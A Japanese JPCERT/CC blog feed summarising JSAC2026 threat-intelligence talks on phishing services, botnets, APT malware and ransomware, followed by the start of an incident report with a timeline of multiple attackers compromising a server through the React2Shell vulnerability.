Song</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_2_%20shadow_liu-lime_chen-albert_song_en.pdf">講演資料（英語）</a> Shadow Liu氏、Lime Chen氏、Albert Song氏は、日本の金融、交通、政府サービスなど多数のブランドを標的とするフィッシング攻撃「CoGUI」と、中国発のPhishing-as-a-Service（PhaaS）「FishingMaster（垂钓大师）」の実態について講演しました。 はじめに、日本を狙う大規模フィッシング攻撃の現状を示し、CoGUIが中国発のFishingMasterにより運営されていることを明らかにしました。 FishingMasterは広告や販売情報が閉鎖的チャネルで提供されてきたため、長らく実態が不明でしたが、第一世代から後継システムへの進化を比較し、ウェブスキャナーデータやアンダーグラウンドコミュニティーの監視、技術調査を通じて、CoGUIの背後にあるインフラ構成と運用エコシステムを体系的に解明したと説明しました。 続いて、2025年に報道を受けて一時的に活動を停止した後、NXやFAへ再ブランド化して活動を継続し、インフラの非公開化や通信暗号化、検出回避機能を強化している状況を紹介しました。 さらに、アトリビューションや地下市場での行動パターンを共有し、ビジネスモデルとリスク管理戦略を考察しました。 最後に、法的圧力や摘発に対しては迅速に活動を縮小する傾向があり、心理的脆弱性が弱点となり得ると分析し、防御側にはURLやAPIパターンの識別、関連インフラ追跡、脅威ハンティングの実践が重要であると述べました。 <h3>The Mechanism for Building a Phishing Admin Panel</h3> <h5>講演者：NTTドコモビジネス株式会社益本将臣</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_3_masaomi_masumoto_jp.pdf">講演資料（日本語）</a> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_3_masaomi_masumoto_en.pdf">講演資料（英語）</a> 益本氏は、Phishing-as-a-Service（PhaaS）の台頭を背景としたフィッシング管理パネルの構築方法と機能について講演を行いました。 はじめに、PhaaSの普及によってフィッシングの技術的ハードルが下がり、攻撃が効率化している現状とフィッシング管理パネル登場の背景を説明しました。近年の管理パネルでは、フィッシングサイトの作成や設定、窃取情報の管理、クローキング設定、ドメイン管理、さらにはワンタイムパスワードの突破まで一元的に操作が可能であると説明しました。 続いて、フィッシング管理パネルの構築方法と技術的仕組みを解説し、Dockerや自動インストールスクリプトにより短時間で構築・削除できる設計となっている点を紹介しました。攻撃インフラは持続性よりも即時性と効率性が重視されていることが特徴であり、構築ツールの分析から利用インフラの情報も把握できると述べました。 さらに、「CoGUI」や「Oriental Gudgeon」などの事例を通じて依存するドメインやURL構造を分析し、PhaaSインフラが実質的に単一のURL・ドメインに依存している点を示しました。特定のURL・ドメインへの依存度が高いことから、それらを遮断することでサービス全体を機能停止に追い込める可能性があると指摘しました。 最後に、フィッシング対策ではサイト単体だけでなく管理パネル自体を特定しテイクダウンすることが重要であり、その第一歩として管理パネルの仕組みや構築方法を理解する必要があると述べました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_3.jpg" alt="JSAC2026_Day2_3.JPG" /> <h3>Combatting residential proxy services in Japan:Part II</h3> <h5>講演者：株式会社リクルート猪野裕司、Reflare, Ltd. Paul Ziegler</h5> 猪野氏がJSAC2022で講演した<a href="https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_3_ino_jp.pdf">「国内悪性プロキシサービスとの闘争」</a>では、当時最大手であったサービス911の出口IPアドレスを1年かけて収集・分析し、一般家庭のインターネット回線を利用したResidential IP Proxy（レジデンシャルプロキシ）の検出と、IPアドレスベースのレピュテーション評価の難しさを解説しました。 本講演では、Paul Ziegler氏とともに、JSAC2022以降、3年間の研究のアップデートとして、国内IPの継続的調査結果をもとにレジデンシャルプロキシの最新動向や悪用実態、検出技術を解説しました。講演内容についてはTLP:REDを多く含むため、詳細については割愛いたします。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_4_01.jpg" alt="JSAC2026_Day2_4_01.JPG" /> <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_4_02.jpg" alt="JSAC2026_Day2_4_02.JPG" /> <h3>A deep-dive into RapperBot C2 operation and DDoS attacks</h3> <h5>講演者：国立研究開発法人情報通信研究機構古川秀之</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_5_hideyuki-furukawa_en.pdf">講演資料（英語）</a> 古川氏は、IoT機器を標的とするDDoSボットネット「RapperBot」について、これまで詳細に報告されていなかったC2オペレーションとDDoS攻撃の実態を、分析結果とともに解説しました。 はじめに、RapperBotの概要として、DVRやネットワークカメラを主な感染対象とし、複数のスキャナーで拡散する仕組みを解説しました。 2022年から調査を継続し、ダークネット監視やハニーポットで収集したデータから、台湾、米国、日本などで多数の感染が確認され、C2サーバーの大規模運用の実態が明らかになったと説明しました。 続いて、2025年3月に発生したX（旧Twitter）の断続的障害とRapperBotのDDoS攻撃タイミングの一致や、中国のオンラインゲーム関連サーバーへの集中攻撃などの具体例を示し、攻撃傾向を解説しました。あわせて、マルウェア構造やC2プロトコル仕様、サーバーローテーション、UIの運用実態を分析し、C2コントロールパネルがマクロ利用やコンソールベースで操作されていた可能性、操作ミスや非効率な設定の存在を報告しました。 さらに、運営者逮捕前の約5カ月間のデータに基づき、C2オペレーション、攻撃コマンドの詳細、標的傾向を整理し、ブラックリスト機能によって再攻撃が阻止され、最終的に通信停止と運営者逮捕に至った経緯を共有しました。 最後に、大規模IoTボットネットの実態把握が脅威理解に不可欠であり、根本対策として脆弱なIoT機器の削減が重要であると述べました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_5.jpg" alt="JSAC2026_Day2_5.JPG" /> <h3>Unraveling the WSUS Exploit Chain: Incident Analysis and Actor Insights</h3> <h5>講演者：NTTセキュリティ・ジャパン株式会社岩田翔平、吉川照規</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_6_shohei_iwata-teruki_yoshikawa_en.pdf">講演資料（英語）</a> 岩田氏、吉川氏は、WSUSのRCEの脆弱性（CVE-2025-59287）を悪用した攻撃インシデントについて、当時どのように分析を進めて攻撃起点の解明に至ったのかを、日々の情報収集から得た気付きを起点とする仮説ベースの深掘り調査や、Velociraptor悪用というTTPの証跡に基づくアトリビューションの考察とともに共有し、インシデント対応の実践的参考事例および脅威動向を踏まえた対策見直しの示唆を提示しました。 はじめに、2025年10月にSOCで観測した日本企業を標的とするWSUSのRCEの脆弱性（CVE-2025-59287）を悪用した事案の概要を紹介しました。本インシデントではWSUSのRCE脆弱性を起点に侵入が行われ、正規のフォレンジック／DFIRツールであるVelociraptorがRMMツールとして悪用されていました。当初は感染経路の情報がなく、EDRの証跡からも真の攻撃起点の特定は困難でしたが、検出された複数のアラートを起点にプロセスツリーとネットワークIoCの相関分析を実施した結果、msi形式のインストーラーを経由したVelociraptor導入の流れを解明し、WSUSのRCEの脆弱性（CVE-2025-59287）が初期アクセスに利用された可能性が高いと結論付けました。 続いて、攻撃フローと使用ツールの詳細を整理し、Velociraptorの設定ファイルやPKI構成、ホスティングサーバーのドメイン、MSIファイル名、AWSアカウント名などの共通点から、複数インシデントが同一主体によるものと裏付けました。 最後に、本事例を踏まえた検知強化や設定見直しの重要性を提言し、インシデント分析の実践的知見を共有しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_6_01.jpg" alt="JSAC2026_Day2_6_01.JPG" /> <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_6_02.jpg" alt="JSAC2026_Day2_6_02.JPG" /> <h3>Continuous Intrusion/Continuous Distribution: Tracking Fox’s Iterative Malspam Campaign</h3> <h5>講演者：伊藤忠サイバー＆インテリジェンス株式会社亀川慧</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_7_satoshi_kamekawa_en.pdf">講演資料（英語）</a> 亀川氏は、2025年9月から10月にかけて観測された「Silver Fox」による日本組織向けフィッシング攻撃キャンペーンについて、5つの期間に分類した攻撃パターンに基づき、不審メールの特徴や攻撃インフラの分析結果、および観測されたマルウェアの技術的解析結果について講演しました。 はじめに、特定組織になりすました文面で本文中にURLを記載する形式のフィッシングメールが大量に送信された調査概要を示しました。メール内の悪意あるURLをクリックすると誘導サイトを経由してローダーがダウンロードされ、さらに追加ペイロードを取得する多段階構造であったと説明しました。 続いて、感染経路の詳細とともに、日本語環境を判定する一方で中国語環境でない場合に動作しない仕組みになっているなど、実装上の矛盾点を解説しました。 さらに、攻撃者はフィッシングメールの送信直前にマルウェアのコンパイルやC2への設置を行うなど、攻撃手法を継続的に更新していた点について説明しました。使用されたマルウェアはValleyRATやVShellで、ValleyRATはこれまで主に中国・台湾の組織を標的とした事例が報告され、日本組織を対象とするケースは多くありませんでしたが、本キャンペーンでは日本も標的となっており、攻撃者が活動範囲を拡大しつつある可能性が示唆されると述べました。 最後に、使用マルウェアの類似性、過去の活動との一致などから「Silver Fox」の関与が疑われるとし、日本語フィッシングメールの監視強化、異常通信の検知・遮断、継続的な脅威分析の重要性を提言しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_7.jpg" alt="JSAC2026_Day2_7.JPG" /> <h3>From Access to Encryption: Uncovering Qilin’s Attack Lifecycle</h3> <h5>講演者：Cisco Talos 武田貴寛</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_8_takahiro_takeda_en.pdf">講演資料（英語）</a> 武田氏は、日本におけるランサムウェアの動向とQilinグループに焦点を当て、複数のインシデント分析に基づく最新の攻撃チェーン全体の流れと初期アクセスをめぐる現状について解説しました。 はじめに、2025年のランサムウェアの国内発生件数が増加傾向にあり、中小企業が過半数を占めている現状を示しました。その中でもQilinが国内事例の一定割合を占め、他グループを大きく上回る存在感を示していると説明しました。 さらに、米国やカナダ、中国、韓国など世界各地で活動を拡大し、リークサイトで継続的に被害企業を公表するなど極めて活発であると述べました。 続いて、Qilinの初期アクセスの実態について解説しました。侵入経路はテレグラムやシグナルなどの通信経路が暗号化されたメッセージアプリ、マーケットフォーラム、イニシャルアクセスブローカーを通じて入手した漏えい認証情報の悪用が中心であり、侵入後は偵察、横展開、認証情報窃取、RMMツールの悪用、データ窃取・暗号化へと進行すると述べました。 また、正規・独自ツールを併用した選択的情報窃取や自動化スクリプトによる仮想環境全体の暗号化、役割分担の明確化、EDR回避などの特徴的TTPについて解説しました。 最後に、暗号化までの期間が短いことからランサムウェア実行前の段階での早期検知が重要であるとし、ログ収集とMFAの徹底、オフラインバックアップ、セキュリティ製品の積極設定に加え、SigmaやYARAルールを活用した検知強化を提言し、今後も攻撃の継続と自動化が懸念されるとまとめました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_8.jpg" alt="JSAC2026_Day2_8.JPG" /> <h3>おわりに</h3> 今回はJSAC2026の2日目に行われた講演について紹介しました。次回のJPCERT/CC Eyesでは引き続き、Workshop／Lightning Talk Session／Panel Discussionについて紹介します。 インシデントレスポンスグループ佐々木奈々恵
JSAC2026 開催レポート～DAY 1～

Fri, 20 Feb 2026 02:00:00 -0000

JPCERT/CC は、2026年1月21日から23日にかけてJSAC2026を...

JPCERT/CC は、2026年1月21日から23日にかけてJSAC2026を開催しました。本カンファレンスは、セキュリティアナリストが一堂に会し、インシデント分析・対応に関連する知見を共有して技術力の底上げを図ることを目的に開催しています。今回が9回目となるJSACですが、本年度は新たな取り組みとしてトレーニングを追加し、計3日間開催しました。講演については、2日間で17件の講演、3件のワークショップ、6件のLightning talkを実施しました。講演資料は、<a href="https://jsac.jpcert.or.jp/timetable.html" title="" target="_blank">JSACのWebサイト</a>で公開しています（一部非公開）。 JPCERT/CC Eyesでは、本カンファレンスの様子を3回に分けて紹介します。 第1回は、DAY 1 Main Trackの講演についてです。 <h3>The Betrayed Update: Beyond the Signpost</h3> <h5>講演者：伊藤忠サイバー＆インテリジェンス株式会社山本高弘</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_1_yamamoto_jp.pdf" title="" target="_blank">講演資料（日本語）</a> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_1_yamamoto_en.pdf" title="" target="_blank">講演資料（英語）</a> 山本高弘氏は、脅威アクター「Tropic Trooper」によって実行された正規アプリのアップデートを契機に発生したインシデントをもとに、原因究明までの調査手順と得られた教訓について共有しました。 調査当初は攻撃者による水平展開やサプライチェーン攻撃が疑われましたが、ログを分析することで、正規アプリケーションの更新先を指し示す構成情報がすり替えられ、不正な更新先へ誘導されていたことを突き止めたと言及しました。さらに、複数事例に対して分析を行ったところ、特定のホームネットワークに接続したときのみ現象が再現する共通点が見つかり、端末ではなくネットワーク側に原因があることが判明したと解説しました。その後、端末へのセンサー導入や調査スクリプトから取得した情報を分析した結果、ホームルーターが参照するキャッシュDNSサーバーに不審なIPアドレスが設定されることで名前解決結果が改ざんされ、特定ドメインのみが偽のアップデートサーバーへ接続され、そこから偽の構成情報のダウンロードを経て最終的にマルウェアが配布・実行されるという一連の流れを示しました。 最後に、対策としてフルトンネルVPN等を用いた信頼されているDNSサーバーへの参照の強制やDNSハイジャッキングに耐性のあるDNS over TLS（DoT）やDNS over HTTPS（DoH）の使用、そして端末側の検知や監視の重要性を挙げ、インシデント分析では事象の結果だけでなく構造と攻撃者の意図を念頭において分析を行うことで有益なインテリジェンスになると結論付けました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_1-640wri.jpg" width="640" height="359" alt="" class="asset asset-image at-xid-4052852 mt-image-left" style="display: inline-block; float: left"/> <h3>Knife Cutting the Edge: Dissecting A Gateway Surveillance & MitM Framework</h3> <h5>講演者：Cisco Talos Chi-en "Ashley" Shen</h5> Chi-en "Ashley" Shen氏は、ルーターや各種エッジデバイスが監視や諜報を目的とするキャンペーンで重要な攻撃対象となっていることを踏まえ、ゲートウェイ上のエッジデバイスで動作するトラフィック検査・改ざん等を可能にするフレームワークについて講演しました。本講演は、TLP:REDとなっているため、詳細については割愛いたします。 <h3>The Return of Old Forces: Revealing New Campaigns Connected to A Missing Cyber Mercenary Firm</h3> <h5>講演者：TrendMicro Joseph Chen</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_3_joseph_chen_en.pdf" title="" target="_blank">講演資料（英語）</a> Joseph Chen氏は、中国企業「i-Soon」との関連が指摘される「Earth Lusca」および「Earth Krahang」による活動について講演しました。 i-Soonは2024年2月に内部資料が流出し、同社が諜報活動や政府機関との関係を有していた可能性が示唆されたことで注目を集めました。関連が指摘される両アクターの活動がリーク後に沈静化した一方、2025年に再稼働した可能性があると説明しました。 2024年10月ごろから観測された「PONDSNAKE」キャンペーンは、政府機関に加え、保険・証券など金融分野を標的としたものであり、初期侵害は公開サーバーの脆弱性を悪用した攻撃やスピアフィッシングメールを起点としており、侵入後にSnakeC2、OneDrive／Microsoft Graph APIをC2に悪用するNEOBEACON、Cobalt Strike、VShell、SoftEther VPNなどを展開したと解説しました。SnakeC2亜種の利用、侵害済み政府サイトの悪用といった共通点を根拠に「Earth Krahang」への帰属は中〜高確度と評価されると言及しました。 また、2025年5月ごろに観測された「WILYCODE」キャンペーンは、政府・教育機関・病院を標的とし、公開サーバーの脆弱性を中心にReact2Shell（CVE-2025-55182）等を用いて攻撃が実施されたと説明しました。加えて、攻撃者はオープンソースのハッキングツールも併用しつつ、HyperBro Launcherを介してCobalt StrikeやVShellを実行したと言及しました。本キャンペーンの帰属は、HyperBro LauncherやC2プロファイルの重なりはあるものの、観測されたTTPの多くが一般的であることから、「Earth Lusca」への帰属は低確度と結論付けたと述べました。 最後に、過去ツールの再利用と新要素の追加が並走する状況では、単一の痕跡に依存せず、複数の独立した証拠を積み上げて判断すべきだと総括しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052853 mt-image-left" style="display: inline-block; float: left"/> <h3>Attribution in Action: A Case Study of an Incident Involving Multiple Activity Clusters</h3> <h5>講演者：Palo Alto Networks 原弘明、Doel Santos</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_4_hiroaki_hara-doel_santos_en.pdf" title="" target="_blank">講演資料（英語）</a> 原弘明氏とDoel Santos氏は、単一組織のインシデントで3つの異なる活動クラスターが同時期に活動していた事例をもとに、観測事実から段階的にアトリビューションを進める手法を解説しました。 クラスターの一つである「CL-STA-1048」は、RawCookie、EggStreme Loader、Gorem RAT、Masol RATなどを用いた侵害を行っていたと言及し、「Earth Estries」など既知グループとの関連性に触れつつも、確度は低いと評価しました。 次に、「CL-STA-1049」では、Hypnosis LoaderによるDLL Proxy-Sideloadingを起点にFluffyGh0stなどを展開する流れを示し、ツールの重複を根拠に「Unfading Sea Haze」との強い関連性を示しました。 さらに、「Stately Taurus」は、HIUPANやUSBFect、USBで拡散するPUBLOAD、CoolClient系のツールを取り上げ、PUBLOADとCoolClientの直接的な実行連鎖は確認できない一方で、難読化技法の一致からコードベースレベルのつながりを示唆しました。 最後に、情報源の信頼性と情報の確からしさを分けて評価する枠組みを用いてアトリビューションを行う取り組みを紹介しつつ、複数のAPTグループ間の綿密な連携によってキャンペーンが実施されるPremier Pass-as-a-Serviceの傾向と、組織内で帰属判断プロセスを再確認する重要性について強調しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_4-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052854 mt-image-left" style="display: inline-block; float: left"/> <h3>Ghost in Your Network: How Earth Kurma Stays Hidden and Exfiltrates Your Data</h3> <h5>講演者：Trend Micro Nick Dai、Sunny W Lu</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_5_nick_dai_sunny-w-lu_en.pdf" title="" target="_blank">講演資料（英語）</a> Nick Dai氏とSunny W Lu氏は、東南アジアの政府や通信分野を狙うAPTグループ「Earth Kurma」の調査結果を発表しました。初期侵害は脆弱なWebサーバーを起点とし、探索・横展開を進めた上で、環境に応じて複数のツール群を使い分けて永続化と検知回避を図る点が特徴だと整理しています。 永続化では、ルートキット／バックドア／ローダーを複合的に投入しており、「MMLOAD」はリフレクティブローディングで段階的に展開します。「KRNRAT」はユーザーモードのエージェントをsvchost.exeへインジェクションしてメモリへの展開を維持し、「MORIYA」は新しいインジェクション方法とEDR回避のための手法が示されました。さらに、「DOWNBEGIN」のCisco Webex版では複数のミーティングルームを用途別のC2チャネルとして悪用する点が紹介されました。 情報の持ち出しについては、PowerShellによる収集・圧縮に加え、OneDrive（ODRIZ）、Dropbox（SIMPOBOXSPY）、Cisco Webex（SIMPOWEBEXSPY）など正規クラウドサービスを攻撃者が悪用し、侵害の痕跡を目立たせなくする戦術が挙げられています。加えて、分散ファイルシステムも展開・持ち出しの両面で悪用される点も強調されました。最後に、Earth Kurmaが使用したTTPに対して、未承認アプリのクラウド通信監視、社内の大容量通信や異常経路の分析、信頼されていないドライバー導入の抑止を対策として提案しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_5-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052855 mt-image-left" style="display: inline-block; float: left"/> <h3>進化を続けるTianwuのマルウェアPangolin8RATおよびカスタムCobalt Strike Beacon</h3> <h5>講演者：株式会社インターネットイニシアティブ高山尚樹</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_6_naoki_takayama_en.pdf" title="" target="_blank">講演資料（英語）</a> 高山尚樹氏は、中国系APTグループ「Tianwu」に関連付けられるマルウェア群のうち、「Pangolin8RAT」とカスタムCobalt Strike Beaconの継続的な進化を報告しました。 2025年9月にVirusTotalへ投稿されたサンプルを起点に、regsvr32.exe等の正規プロセスによって「CoreX Loader」が読み込まれ、リソースに埋め込まれたデータをXORとAESを用いて復号し、最終的にPangolin8RAT本体をメモリ展開する一連の実行チェーンを整理しました。 Pangolin8RATはプラグイン取得による機能拡張を前提とした設計であり、ログや一部データが再起動後に削除されるなど、痕跡を残しにくい点が特徴的だと解説しました。また、NutstoreのWebDAV悪用、HTTPS通信における独自構造のCookie利用、Hostヘッダー差し替えによる通信先の隠蔽といった通信面の特徴も取り上げました。さらに、文字列難読化の強化、RTTI抑制、特定プロセス検知時に設定データをXOR化する仕組みなど、検知回避の進化点を示しました。 Beacon側についても、スリープマスク用BOFの組み込みや設定エンコード方式の変更といった改良が確認された一方、ヘッダーに旧C2情報が残存するなど過去設定を示唆する運用上の痕跡から、開発・運用の実態を推定しました。 最後に、活動は2022年以降も継続しつつ、少なくとも2024年10月ごろから活動を再開した可能性があるとして、YARA／SigmaルールおよびIoCの共有を通じた継続監視の重要性を総括しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_6-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052856 mt-image-left" style="display: inline-block; float: left"/> <h3>Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti</h3> <h5>講演者：TeamT5 Greg Chen、Sharon Liu</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_7_Greg_chen_Sharon_liu_en.pdf" title="" target="_blank">講演資料（英語）</a> Greg Chen氏とSharon Liu氏は、Ivanti Connect Secure（ICS）などのVPN／ゲートウェイ製品に対する大規模な攻撃キャンペーンを題材に、エッジ機器におけるインシデント対応と調査手法を解説しました。はじめに、キャンペーンの概要としてSPAWNファミリーを伴う侵入として把握した被害は170台にのぼり、25地域に分布し、日本・台湾・韓国・米国で多く観測されたと報告しました。 次に、Ivanti Connect Secureの調査上の制約として、システム領域が暗号化されていること、管理がGUI中心でログやファイルを確認しにくいこと、そしてベンダー提供の整合性チェックツールの結果に依存しやすいことを整理しました。その上で、リモートデバッグ等のベンダー支援による解析、ディスクイメージを復号してのオフライン解析、さらにラボ環境に限ってSSH管理コンソールを用いた検証を提示しました。また、不審バイナリの特定においては、整合性検査のハッシュ照合だけに頼らず、タイムスタンプの外れ値、静的／動的リンク方式の差、ELFのメタ情報などを併用した検出の有効性を示しました。 最後に、攻撃チェーンはCVE悪用を起点に、TLSトラフィックをフックしてハイジャックするインメモリ型バックドア「TextDoor」、SPAWNファミリーによる永続化、「DebtTheft」による認証情報窃取へと連鎖すると整理しました。加えて、整合性検査の回避を前提に、プロトコル分析やネットワークシグネチャを用いて未知の被害を探索する重要性を強調しました。 <h3>Infrastructure-less Adversary: C2 Laundering via Dead-Drop Resolvers and the Microsoft Graph API</h3> <h5>講演者：Cycraft Wei-Chieh Chao、Shih-Min Chan</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_8_wei-chieh_chao_shih-min_chan_en.pdf" title="" target="_blank">講演資料（英語）</a> Wei Chieh Chao氏とShih Min Chan氏は、台湾の政府機関および製造業を標的とする中国系の国家支援型アクターの事例をもとに、攻撃者が独自インフラを前面に出さず、正規の通信基盤を悪用してC2通信を成立させる「インフラレス」手口について解説しました。 事例として用いられたインシデントでは、フィッシングを通して侵入した後、AD CSの設定不備等を背景に権限昇格を行った後に横展開を実施し、SoftEther VPNなどのリモート接続基盤を設置した上で、Microsoft Graph API、Cloudflare背後のC2、さらに侵害された公開Webサイトを「デッドドロップ」となっているリゾルバーとして併用したと言及しました。また、ADログオンスクリプトを短時間だけ改ざんして全端末へ配布・実行し、その後すぐに元へ戻すことで検知を回避する点を強調しました。解析では三つのマルウェアを取り上げ、GRAPHBROTLI／GRAPHRELOOKがMicrosoft Graph APIをC2に転用し、Outlook APIをC2通信に使用する点や、RCREMARKがCloudflare背後のC2と通信し、HTMLコメントに埋め込まれた命令を取得してコマンドを実行する点について解説しました。 最後に、結論として、短時間の改変と正規基盤の悪用のためブロックリスト中心の防御は機能しにくく、ログオンスクリプトの保護・監視と、クラウドAPI／Webアクセスを含む通信の監視が重要だと総括しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_8-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4052857 mt-image-left" style="display: inline-block; float: left"/> <h3>Konni’s New Arsenal: Unmasking GSRAT in North Korea-linked APT Operation</h3> <h5>講演者：株式会社ラック松本拓馬、石川芳浩</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_1_9_takuma_matsumoto-yoshihiro_ishikawa_en.pdf" title="" target="_blank">講演資料（英語）</a> 松本拓馬氏と石川芳浩氏は、北朝鮮系の脅威アクターとされる「Konni」に関連する活動として、2025年2月以降に確認されたAutoIt製RAT「GSRAT」を用いた攻撃を解説しました。2025年5月には、国内金融機関に関連する組織を標的に、関連会社を装うスピアフィッシングでリンクを送付したと報告しました。 スピアフィッシングによりダウンロードされたZIP内の文書ファイルを装ったショートカットファイルを起点に、LNK内の難読化スクリプトが実行されてデコイを表示します。同時に追加ファイルを取得して展開し、VBSおよびBATを経由してAutoItを実行したと説明しました。さらに、スタートアップフォルダーへの登録とスケジュールタスクの作成によって永続化し、コンパイル済みAutoItスクリプトに埋め込まれたGSRATがC2と通信して遠隔操作を行う流れを示しました。 また、AutoItの特徴として、WindowsのGUI自動化やAPI呼び出し能力を備え、単体で実行形式にコンパイルできるため依存が少なく比較的軽量である点を整理しました。あわせて、近年多く確認されているEA06形式を含むエンコードの特徴と抽出手法を紹介しました。GSRATは端末固有情報から生成した識別子とバージョンを送信し、リモートシェル、ファイル送受信、列挙、削除、実行などの基本機能を提供しており、亜種では通信のJSON化や区切り文字の導入などの改変も確認されたと述べました。 最後に、Custom Lilith RATからGSRATへの移行やインフラ運用の特徴を根拠にKonniとの関連を示し、検知としてYARA／Sigmaルールの活用、AutorunsとEDRによる監視に加え、AppLockerやWDACで署名情報を用いてAutoIt実行を制限する重要性を総括しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2026_Day1_9-640wri.jpg" width="640" height="413" alt="" class="asset asset-image at-xid-4052858 mt-image-left" style="display: inline-block; float: left"/> <h3>おわりに</h3> 今回はJSAC2026の1日目に行われた講演について紹介しました。次回のJPCERT/CC Eyesでは引き続き、2日目に行われた講演について紹介します。 インシデントレスポンスグループ亀井智矢
React2Shellを悪用する複数の攻撃アクターによる侵害事例

Fri, 13 Feb 2026 02:00:00 -0000

2025年12月3日（現地時間）、React Server Components...

2025年12月3日（現地時間）、React Server Components（RSC）における認証不要のリモートコード実行の脆弱性（<a href="https://www.jpcert.or.jp/newsflash/2025120501.html" target="_blank">CVE-2025-55182</a>）が公開されました。JPCERT/CCでは、この攻撃の被害報告を複数受けています。その中で、本脆弱性を短期間のうちに複数の攻撃アクターに悪用され、Webサイト改ざんなど複数の被害が同時に発生した事案がありました。今回は容易に悪用可能な脆弱性が公表された場合に、攻撃者がいかに迅速かつ無差別に攻撃を行っているかを攻撃のタイムラインや使用されたマルウェアの紹介とあわせて解説します。このような深刻な脆弱性が公開された場合に、どのくらいのスピード感で対策を進めなければならないかという参考になればと思います。 <h3>攻撃のタイムライン</h3> 表1は今回紹介する事案で判明した攻撃のタイムラインです。（被害組織の特定につながる恐れがあるため、以降の一部のURLパスや識別子などはマスクしています） <table border="1" width="100%"> <caption>表1：攻撃のタイムライン</caption> <thead> <tr> <th><div style="text-align: center;">日時（JST）</div></th> <th><div style="text-align: center;">内容</div></th> </tr> </thead> <tbody> <tr> <td align="left">2025-12-05 15:52</td> <td>コインマイナー（sex.sh、xmrig）の設置</td> </tr> <tr> <td align="left">2025-12-06 07:28</td> <td>コインマイナー（sex.sh.1）の設置</td> </tr> <tr> <td align="left">2025-12-06 09:53、10:09、11:00</td> <td>HISONIC（javax）バックドアの設置</td> </tr> <tr> <td align="left">2025-12-06 15:00</td> <td>Global Socket（npm-cli）をcron経由で毎時実行</td> </tr> <tr> <td align="left">2025-12-06 19:31</td> <td>SNOWLIGHTのダウンローダー（javas）、CrossC2（rsyslo）の設置</td> </tr> <tr> <td align="left">2025-12-07 12:24</td> <td>コインマイナー（xmrig）の設置</td> </tr> <tr> <td align="left">2025-12-07 16:51</td> <td>/tmp/kernal（kernelに偽装）を毎分実行するようにcron設定を書き替え</td> </tr> <tr> <td align="left">2025-12-07 19:46</td> <td>サイト改ざん（警告メッセージの表示）</td> </tr> <tr> <td align="left">2025-12-07 22:15</td> <td>サービス利用者からの報告によって発覚</td> </tr> </tbody> </table> React2Shellの脆弱性が2025年12月3日に公開されてからわずか2日後にはコインマイナーの設置を狙った攻撃が行われており、それを皮切りに複数の攻撃者によってRATやバックドアなどのさまざまなマルウェアが設置・実行され、一つのサーバー上に複数の攻撃者が侵入している状況が見られました。 また、上記のタイムライン以外にも、2025年12月5日～7日の期間でWebサーバーのアクセスログ上に100を超えるIPアドレスからReact2Shellの脆弱性を狙ったと思われる不審なHTTP POST通信（アクセスログにはリクエストヘッダーやPOSTデータは記録されていなかったため、UserAgentやリクエストパス、レスポンスサイズなどをもとに推定）が観測されており、実際にはさらに多くの攻撃者から侵害を受けていた可能性もあります。 <h3>発端となったWebサイト改ざん</h3> 今回の事案は、攻撃者によってWebサイトが改ざんされていることに気づいたWebサイト利用者からの報告によって侵害が発覚しました。改ざんされたWebサイトでは、4カ国語で「CVE-2025-55182の脆弱性があるため、早急にパッチの適用が必要」といった警告が表示されていました。図1は改ざんされたWebページの例です。 <figure class="mt-figure mt-figure-center"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/react2shell-fig1-640wri.png" width="800" height="347" alt="" class="asset asset-image at-xid-1862911 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/><figcaption>図1：改ざんされたWebページ</figcaption></figure> 上記の改ざんは国内外問わず複数のWebサイトで確認されており、いずれも早急な脆弱性対処を促す文面が記載されていました。図2は検索エンジンで表示された改ざんサイトの例です。 <figure 